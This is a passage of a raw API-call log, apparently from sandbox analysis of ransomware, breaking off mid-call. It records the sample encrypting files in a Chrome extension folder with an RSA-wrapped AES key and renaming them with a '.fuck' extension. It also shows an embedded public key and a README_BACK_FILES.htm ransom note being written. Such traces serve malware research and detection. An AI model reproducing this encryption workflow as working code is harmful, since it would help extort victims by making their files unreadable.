CryptImportPublicKeyInfo (in: hCryptProv=0x2e723e8, dwCertEncodingType=0x1, pInfo=0x2eac7f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eac820*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eac828*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7dc80) returned 1 [0261.694] CryptEncrypt (in: hKey=0x2e7dc80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0261.694] CryptEncrypt (in: hKey=0x2e7dc80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e71728*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e71728*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0261.694] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e71728*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e71728*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0261.696] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x3b, lpOverlapped=0x0) returned 1 [0261.697] CryptEncrypt (in: hKey=0x2e7dc00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x3b, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x40) returned 1 [0261.697] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x40, lpOverlapped=0x0) returned 1 [0261.697] CloseHandle (hObject=0x5d60) returned 1 [0261.698] CloseHandle (hObject=0x5d64) returned 1 [0261.698] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html"), bFailIfExists=0) returned 1 [0261.701] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html", dwFileAttributes=0x0) returned 1 [0261.701] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.gsg")) returned 1 [0261.702] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.fuck")) returned 1 [0261.704] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0261.704] CryptDestroyKey (hKey=0x2e7dc00) returned 1 [0261.704] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0261.704] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0261.704] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0261.704] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\readme_back_files.htm")) returned 0xffffffff [0261.704] AreFileApisANSI () returned 1 [0261.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 161 [0261.704] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0261.705] GetFileType (hFile=0x5d50) returned 0x1 [0261.705] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0261.707] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0261.707] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2e7fc00 [0261.708] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0261.708] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0261.709] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0261.709] GetLastError () returned 0x0 [0261.709] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html")) returned 0x20 [0261.709] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html", dwFileAttributes=0x80) returned 1 [0261.710] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0261.710] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0261.712] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.gsg", dwFileAttributes=0x2) returned 1 [0261.713] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7a500) returned 1 [0261.715] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0261.715] lstrlenA (lpString="yhIePWeHCpPAWIDQWkbMuMJxzMlQm") returned 29 [0261.715] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0261.715] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7dc00) returned 1 [0261.715] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0261.715] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0261.715] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e722d8) returned 1 [0261.716] CryptImportPublicKeyInfo (in: hCryptProv=0x2e722d8, dwCertEncodingType=0x1, pInfo=0x2eac0a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eac0d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eac0d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7de40) returned 1 [0261.716] CryptEncrypt (in: hKey=0x2e7de40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0261.716] CryptEncrypt (in: hKey=0x2e7de40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e71d88*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e71d88*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0261.716] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e71d88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e71d88*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0261.720] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.725] CryptEncrypt (in: hKey=0x2e7dc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.725] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.733] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.734] CryptEncrypt (in: hKey=0x2e7dc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.734] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.735] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.735] CryptEncrypt (in: hKey=0x2e7dc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.735] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.735] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.735] CryptEncrypt (in: hKey=0x2e7dc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.735] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.735] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.735] CryptEncrypt (in: hKey=0x2e7dc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.735] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.736] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.736] CryptEncrypt (in: hKey=0x2e7dc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.736] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.736] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x24c, lpOverlapped=0x0) returned 1 [0261.736] CryptEncrypt (in: hKey=0x2e7dc00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x24c, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x250) returned 1 [0261.736] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x250, lpOverlapped=0x0) returned 1 [0261.736] CloseHandle (hObject=0x5d64) returned 1 [0261.736] CloseHandle (hObject=0x5d60) returned 1 [0261.737] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html"), bFailIfExists=0) returned 1 [0261.741] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html", dwFileAttributes=0x0) returned 1 [0261.756] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.gsg")) returned 1 [0261.757] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.html.fuck")) returned 1 [0261.758] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0261.759] CryptDestroyKey (hKey=0x2e7dc00) returned 1 [0261.759] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0261.759] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0261.759] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0261.759] GetLastError () returned 0x0 [0261.759] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js")) returned 0x20 [0261.759] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js", dwFileAttributes=0x80) returned 1 [0261.759] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0261.760] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0261.761] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.gsg", dwFileAttributes=0x2) returned 1 [0261.761] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7a500) returned 1 [0261.764] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0261.764] lstrlenA (lpString="sMlycgvlQVZfOQrrHUueZgtAzMlQm") returned 29 [0261.764] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0261.764] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7dc00) returned 1 [0261.764] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0261.764] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0261.764] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e71e10) returned 1 [0261.765] CryptImportPublicKeyInfo (in: hCryptProv=0x2e71e10, dwCertEncodingType=0x1, pInfo=0x2eac8c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eac8f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eac8f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7dfc0) returned 1 [0261.765] CryptEncrypt (in: hKey=0x2e7dfc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0261.765] CryptEncrypt (in: hKey=0x2e7dfc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e71f20*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e71f20*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0261.765] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e71f20*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: 